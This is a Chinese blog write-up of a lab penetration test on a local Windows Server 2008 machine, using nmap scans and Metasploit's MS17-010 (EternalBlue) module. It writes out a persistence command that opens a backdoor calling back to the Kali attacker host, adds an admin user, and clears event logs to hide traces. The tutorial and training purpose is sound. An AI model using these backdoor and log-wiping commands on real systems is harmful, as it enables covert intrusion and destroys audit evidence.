记一次本地Windows-2008渗透测试

文章目录

一、概述

本次渗透测试是在已知Windows server 2008中存在某些漏洞的情况下,进行的验证性测试,目的在于熟悉渗透测试流程,掌握渗透测试工具的基本使用方法。
首先明确我们的渗透测试目标:Windows server 2008(192.168.6.135)
其次明确我们的渗透测试步骤:

  • 信息收集
  • 漏洞嗅探
  • 漏洞利用
  • 提权与维权
  • 痕迹清理
  • 渗透测试总结

最后是明确需要使用到的工具:nmap,MSF,Kali(192.168.6.128).
梳理好这些思路之后,便可以开始我们的渗透测试。

二、信息收集

对主机的信息收集全程使用nmap进行,作为一款强大的信息收集工具,nmap具备了主机探测、端口扫描、服务版本扫描、主机系统指纹识别、漏洞探测等功能。
本次信息收集主要有以下步骤:

1、主机探测

通过对目标主机所在子网进行批量探测,发现目标主机处于活跃状态,并开放了21、80、445、3389等端口。
探测语法:nmap 192.168.6.0/24
记一次本地Windows-2008渗透测试

2、系统指纹识别

探测语法:nmap -O 192.168.6.135
记一次本地Windows-2008渗透测试

3、服务指纹识别

对主机进行服务指纹信息探测,收集相关服务信息。
探测语法:nmap -sV 192.168.6.135
记一次本地Windows-2008渗透测试

4、常见漏洞探测

由于该主机开放了445、3389等端口,通过探测445端口,发现该主机存在ms17-010(永恒之蓝)、ms12-020(远程桌面协议RDP拒绝访问)等高危漏洞。
探测语法:nmap --script=vuln 192.168.6.135
1)445端口下的永恒之蓝漏洞:
记一次本地Windows-2008渗透测试2)3389端口下的拒绝访问漏洞
记一次本地Windows-2008渗透测试

三、漏洞利用、提权与维权

漏洞利用、提权与维权,我们需要用到的是MSF这一个渗透测试工具,借助其强大与全面的攻击模块来进行攻击,对于我们做验证性测试的初学者来说,简单易上手。在此次测试中仅以MS17-010(永恒之蓝)漏洞进行验证测试。

1、MS17-010漏洞利用

1)在MSF中搜索可利用的攻击模块(search ms17-010)
记一次本地Windows-2008渗透测试2)选用相应的攻击模块进行攻击,并设置相关参数进行攻击。在这里由于目标系统是win 2008,所以使用第二个通用攻击模块。
记一次本地Windows-2008渗透测试
3)攻击成功,获得meterpreter后渗透模块。
记一次本地Windows-2008渗透测试

2、提权与维权

进入shell,查看当前用户权限已经为system权限,为方便后面测试,在管理员用户组添加新用户。
记一次本地Windows-2008渗透测试
使用persistence创建一个持久性的后门。
语法: run persistence -S -U -X -i 5 -p 4444 -r 192.168.6.128
详细信息如下:

-S:在启动时自动启动代理作为服务,具有系统权限。
-U:在用户登录时自启动代理
-X:在系统启动时自启动代理
-i:每次尝试连接之间的时间间隔(单位为 s)
-p:运行metasploit的用户监听的端口
-r:运行监听程序metasploit用户的IP
记一次本地Windows-2008渗透测试

在MSF 中设置监听程序,运行后发现对应的后门已经建立:

记一次本地Windows-2008渗透测试

3、痕迹清除

在meterpreter中使用run event_manager -i命令可查看日志信息,通过 run event_manager -cclearv 命令清除对登录日志。
记一次本地Windows-2008渗透测试

上一篇:SQL Server 2008 复习(一)


下一篇:Weak Pair HDU - 5877 T14 D57